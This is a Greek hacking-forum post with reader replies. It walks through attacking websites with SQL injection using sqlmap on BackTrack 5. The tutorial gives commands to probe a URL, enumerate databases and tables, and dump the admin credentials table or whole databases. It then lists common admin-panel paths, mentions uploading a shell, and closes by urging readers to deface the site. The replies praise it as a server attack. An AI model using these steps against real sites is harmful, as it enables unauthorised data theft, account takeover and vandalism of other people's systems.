SQL Injection Χρησιμοποιώντας το BackTrack

Το SQL Injection είναι μια συχνή μέθοδος επίθεσης στις DataBase μιας ιστοσελίδας...
Για να το κάνουμε και εμείς αυτό θα χρειαστούμε μια έκδοση του BackTrack καλύτερα το 5 R1 και μια vulnerable σελίδα.
Πριν ξεκινήσουμε την επίθεση, θα πρέπει πρώτα να ελέγξουμε το site αν είναι vulnerable αυτό θα το κάνουμε με έναν πολύ απλό τρόπο. Προσθέτοντας ένα ' στο τέλος του URL της σελίδας
πχ http://www.example.com/index.php?id=123' αν αυτό μας δώσει ένα οποιοδήποτε σφάλμα σημάνει ότι είναι vulnerable Αν ΔΕΝ μας δώσει και η σελίδα φορτώσει κανονικά τότε το site ΔΕΝ είναι vulnerable
Αφού έχουμε ελέγξει και έχουμε δει ότι είναι vulnerable στο SQL Injection τότε προχωράμε στο επόμενο βήμα που είναι το BackTrack..
Στο terminal του BackTrack πληκτρολογούμε την εντολή: cd /pentest/database/sqlmap και πατάμε enter. Μετά python sqlmap.py -u την διεύθυνση της σελίδας ΧΩΡΙΣ ΤΟ ' --dbs
πχ python sqlmap.py -u http://www.example.com/index.php?id=123 --dbs και enter..
Αυτό θα πρέπει να μας δώσει τα ονόματα των DataBase.. Όταν ολοκληρωθεί η εντολή αυτή θα έχουμε ένα μεγάλο κείμενο που κάπου εκεί θα λέει τα ονόματα των DataBase πρέπει να τα βρείτε για να συνεχιστεί η επίθεση! Ας πούμε ότι βρήκαμε αυτές τις DataBase:
available databases [2]:
[*] database1
[*] database2
Τώρα θέλουμε να βρούμε τα tables για να βρούμε κωδικούς των διαχειριστών κλπ Αυτό θα το πετύχουμε με την εντολή:
python sqlmap.py -u http://www.example.com/index.php?id=123 --tables -D database1
Αυτό μπορεί να σας δώσει ΠΟΛΛΑ tables.. Εσείς θα Ασχοληθείτε με αυτό που σας ενδιαφέρει.. Ας πούμε ότι θέλουμε τον κωδικό του administrator.. Βρήκαμε ένα table με όνομα admin και υποθέτουμε ότι οι κωδικοί και το username του είναι εκεί οπότε θέλουμε να ανοίξουμε αυτό το table!
python sqlmap.py -u http://www.example.com/index.php?id=123 -D database1 -T admin --dump
ή εάν θέλουμε να ανοίξουμε όλα τα tables μίας DataBase:
python sqlmap.py -u http://www.example.com/index.php?id=123 --tables -D database1 --dump-all
Τώρα αν κάνατε τα πάντα σωστά θα έχετε πρόσβαση στην σελίδα ως διαχειριστής Very Happy

υπάρχει περίπτωση να μην μπορείτε να κάνετε πολλές αλλαγές από εκεί.. Γιαυτό θα πρέπει να ανεβάσετε ένα shell στην DataBase..
Και επίσης να βρείτε και το Admin Panel!
Το πιο συνηθισμένο είναι:
/admin
/administrator
/admin/login
/admin_login
/login
Κ.α Very Happy

Αυτό ήταν τώρα μπείτε και κάντε Deface ή ΟΤΙ άλλο θέλετε!! Very Happy

Μπράβο! ρε t3rm καλά που έχουμε και εσένα και μας τα λες αναλυτικά 10x:

WRAIA! Apo edw 8a pernw instructions gia sqlmap

10x:

Πολύ ωραίο post!!! Μια απ' τις πιο δυνατές επιθέσεις σε server... Ευκολη δουλειά για το BackTrack και πολυ χρήσιμη Smile

Μπραβο Term... Smile

Ναι όντος είναι καλό αλλά δεν πετυχαίνει Neutral

Το SQL Ninja νομίζω οτι είναι πολύ καλο γιατί είχα δει στο youtube ένα tutorial που έδιχνε πως το χρησιμοποιούσε και στο τέλος είχε πρόσβαση στο cmd του θύματος του! Αλλα δεν ξέρω να το χρησιμοποιώ πρέπει να ρυθμίσεις ένα αρχείο και δεν ξέρω πως Neutral

Ούτε τι ακριβώς κάνει δεν ξέρω Razz

8a ta broume kai auta

To elpizw kapoia stigmh Razz

» BACKTRACK 5
» Εγκατάσταση του Τοr στο BackTrack 5 R1
» προβλημα με backtrack 5 r2
» backtrack download help!
» DoS επίθεση με το BackTrack 5 R1 | Slowloris.pl